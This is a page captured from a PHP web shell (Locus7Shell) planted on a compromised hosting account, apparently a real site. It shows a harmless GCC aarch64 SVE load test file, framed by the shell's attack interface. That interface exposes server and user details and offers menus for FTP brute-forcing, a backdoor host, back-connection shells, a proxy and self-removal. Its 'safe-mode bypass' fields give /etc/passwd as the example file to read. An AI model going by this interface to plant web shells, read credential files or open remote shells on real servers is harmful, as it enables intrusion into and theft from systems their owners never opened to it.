Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve/acle/asm/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     ld1_s32.c (3.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-final { check-function-bodies "**" "" "-DCHECK_ASM" { target { ! ilp32 } } } } */

#include "test_sve_acle.h"

/*
** ld1_s32_base:
**    ld1w    z0\.s, p0/z, \[x0\]
**    ret
*/
TEST_LOAD (ld1_s32_base, svint32_t, int32_t,
       z0 = svld1_s32 (p0, x0),
       z0 = svld1 (p0, x0))

/*
** ld1_s32_index:
**    ld1w    z0\.s, p0/z, \[x0, x1, lsl 2\]
**    ret
*/
TEST_LOAD (ld1_s32_index, svint32_t, int32_t,
       z0 = svld1_s32 (p0, x0 + x1),
       z0 = svld1 (p0, x0 + x1))

/*
** ld1_s32_1:
**    ld1w    z0\.s, p0/z, \[x0, #1, mul vl\]
**    ret
*/
TEST_LOAD (ld1_s32_1, svint32_t, int32_t,
       z0 = svld1_s32 (p0, x0 + svcntw ()),
       z0 = svld1 (p0, x0 + svcntw ()))

/*
** ld1_s32_7:
**    ld1w    z0\.s, p0/z, \[x0, #7, mul vl\]
**    ret
*/
TEST_LOAD (ld1_s32_7, svint32_t, int32_t,
       z0 = svld1_s32 (p0, x0 + svcntw () * 7),
       z0 = svld1 (p0, x0 + svcntw () * 7))

/* Moving the constant into a register would also be OK.  */
/*
** ld1_s32_8:
**    incb    x0, all, mul #8
**    ld1w    z0\.s, p0/z, \[x0\]
**    ret
*/
TEST_LOAD (ld1_s32_8, svint32_t, int32_t,
       z0 = svld1_s32 (p0, x0 + svcntw () * 8),
       z0 = svld1 (p0, x0 + svcntw () * 8))

/*
** ld1_s32_m1:
**    ld1w    z0\.s, p0/z, \[x0, #-1, mul vl\]
**    ret
*/
TEST_LOAD (ld1_s32_m1, svint32_t, int32_t,
       z0 = svld1_s32 (p0, x0 - svcntw ()),
       z0 = svld1 (p0, x0 - svcntw ()))

/*
** ld1_s32_m8:
**    ld1w    z0\.s, p0/z, \[x0, #-8, mul vl\]
**    ret
*/
TEST_LOAD (ld1_s32_m8, svint32_t, int32_t,
       z0 = svld1_s32 (p0, x0 - svcntw () * 8),
       z0 = svld1 (p0, x0 - svcntw () * 8))

/* Moving the constant into a register would also be OK.  */
/*
** ld1_s32_m9:
**    decb    x0, all, mul #9
**    ld1w    z0\.s, p0/z, \[x0\]
**    ret
*/
TEST_LOAD (ld1_s32_m9, svint32_t, int32_t,
       z0 = svld1_s32 (p0, x0 - svcntw () * 9),
       z0 = svld1 (p0, x0 - svcntw () * 9))

/*
** ld1_vnum_s32_0:
**    ld1w    z0\.s, p0/z, \[x0\]
**    ret
*/
TEST_LOAD (ld1_vnum_s32_0, svint32_t, int32_t,
       z0 = svld1_vnum_s32 (p0, x0, 0),
       z0 = svld1_vnum (p0, x0, 0))

/*
** ld1_vnum_s32_1:
**    ld1w    z0\.s, p0/z, \[x0, #1, mul vl\]
**    ret
*/
TEST_LOAD (ld1_vnum_s32_1, svint32_t, int32_t,
       z0 = svld1_vnum_s32 (p0, x0, 1),
       z0 = svld1_vnum (p0, x0, 1))

/*
** ld1_vnum_s32_7:
**    ld1w    z0\.s, p0/z, \[x0, #7, mul vl\]
**    ret
*/
TEST_LOAD (ld1_vnum_s32_7, svint32_t, int32_t,
       z0 = svld1_vnum_s32 (p0, x0, 7),
       z0 = svld1_vnum (p0, x0, 7))

/* Moving the constant into a register would also be OK.  */
/*
** ld1_vnum_s32_8:
**    incb    x0, all, mul #8
**    ld1w    z0\.s, p0/z, \[x0\]
**    ret
*/
TEST_LOAD (ld1_vnum_s32_8, svint32_t, int32_t,
       z0 = svld1_vnum_s32 (p0, x0, 8),
       z0 = svld1_vnum (p0, x0, 8))

/*
** ld1_vnum_s32_m1:
**    ld1w    z0\.s, p0/z, \[x0, #-1, mul vl\]
**    ret
*/
TEST_LOAD (ld1_vnum_s32_m1, svint32_t, int32_t,
       z0 = svld1_vnum_s32 (p0, x0, -1),
       z0 = svld1_vnum (p0, x0, -1))

/*
** ld1_vnum_s32_m8:
**    ld1w    z0\.s, p0/z, \[x0, #-8, mul vl\]
**    ret
*/
TEST_LOAD (ld1_vnum_s32_m8, svint32_t, int32_t,
       z0 = svld1_vnum_s32 (p0, x0, -8),
       z0 = svld1_vnum (p0, x0, -8))

/* Moving the constant into a register would also be OK.  */
/*
** ld1_vnum_s32_m9:
**    decb    x0, all, mul #9
**    ld1w    z0\.s, p0/z, \[x0\]
**    ret
*/
TEST_LOAD (ld1_vnum_s32_m9, svint32_t, int32_t,
       z0 = svld1_vnum_s32 (p0, x0, -9),
       z0 = svld1_vnum (p0, x0, -9))

/* Using MUL to calculate an index would also be OK.  */
/*
** ld1_vnum_s32_x1:
**    cntb    (x[0-9]+)
**    madd    (x[0-9]+), (x1, \1|\1, x1), x0
**    ld1w    z0\.s, p0/z, \[\2\]
**    ret
*/
TEST_LOAD (ld1_vnum_s32_x1, svint32_t, int32_t,
       z0 = svld1_vnum_s32 (p0, x0, x1),
       z0 = svld1_vnum (p0, x0, x1))

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0061 ]--